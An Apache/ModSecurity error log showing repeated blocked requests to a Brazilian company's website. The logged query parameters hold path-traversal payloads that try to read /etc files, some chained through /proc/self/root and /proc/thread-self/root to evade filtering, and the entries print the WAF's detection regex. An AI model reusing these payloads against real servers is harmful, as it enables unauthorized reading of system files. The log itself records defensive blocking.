[Fri Mar 20 10:57:18.072215 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.241.31:37190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SPl1pVZ5mVmJwsFNVSwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:19.502004 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.241.31:46408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SP_XLqtnMIWvjpaLBWAAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:57:22.327616 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.69:59778] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SQvqxLDW4GITHUkQPgAAAAQY"]
[Fri Mar 20 10:57:31.703597 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.94:60072] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SS-oXxyEfFpUF8f-l_wAAAVE"]
[Fri Mar 20 10:57:31.891084 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:46410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SS9a6ubjKNq_cu4YARwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:32.891440 2026] [:error] [pid 11642:tid 140411674785536] [client 57.141.18.35:60082] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1STLninkcc-iUj5AqDSwAAA4g"]
[Fri Mar 20 10:57:36.751718 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.34:60174] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1SUAF0L0L-SsrnPo6O0QAAAsk"]
[Fri Mar 20 10:57:37.632044 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.9:60228] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SUTJ3M9BSuKP7CAZLCwAAAJY"]
[Fri Mar 20 10:57:40.197621 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.241.31:49932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SVPHIg5MgXLBnicMb0gAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:57:41.545041 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:48436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SVQF0L0L-SsrnPo6O1AAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:43.994663 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:48450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SV-oXxyEfFpUF8f-mCQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:46.111293 2026] [:error] [pid 7893:tid 140411691570944] [client 216.73.216.191:60516] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SWhCii7xarUs8iHaQNwAAAgY"]
[Fri Mar 20 10:57:46.436555 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:60504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SWta6ubjKNq_cu4YAYwAAA08"]
[Fri Mar 20 10:57:50.117402 2026] [:error] [pid 7893:tid 140411699963648] [client 216.73.216.191:60766] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SXhCii7xarUs8iHaQOwAAAgU"]
[Fri Mar 20 10:57:52.150937 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.88:60906] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1SYF1pVZ5mVmJwsFNVYgAAAE8"]
[Fri Mar 20 10:57:54.696185 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:45958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SYta6ubjKNq_cu4YAbAAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:57:54.875006 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.80:32838] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1SYl1pVZ5mVmJwsFNVZAAAAEY"]
[Fri Mar 20 10:57:55.537392 2026] [:error] [pid 7893:tid 140411641214720] [client 216.73.216.191:32806] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SYxCii7xarUs8iHaQQgAAAgw"]
[Fri Mar 20 10:57:56.051884 2026] [:error] [pid 21219:tid 140411548894976] [client 216.73.216.191:32898] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SZPXLqtnMIWvjpaLBbQAAApc"]
[Fri Mar 20 10:58:06.915518 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.9:33370] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Sbl1pVZ5mVmJwsFNVZQAAAE0"]
[Fri Mar 20 10:58:08.851358 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.35:33492] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1ScPqxLDW4GITHUkQPswAAAQY"]
[Fri Mar 20 10:58:16.042997 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:48456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SePqxLDW4GITHUkQPzAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:58:22.191086 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:55520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SfjJ3M9BSuKP7CAZLQwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:58:25.188217 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.10:34102] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Sgda6ubjKNq_cu4YAkgAAA0Q"]
[Fri Mar 20 10:58:26.669293 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.77:34122] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Sgda6ubjKNq_cu4YAkwAAA1I"]
[Fri Mar 20 10:58:28.307204 2026] [:error] [pid 31215:tid 140411741927168] [client 57.141.18.98:34222] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1ShAF0L0L-SsrnPo6PGAAAAsA"]
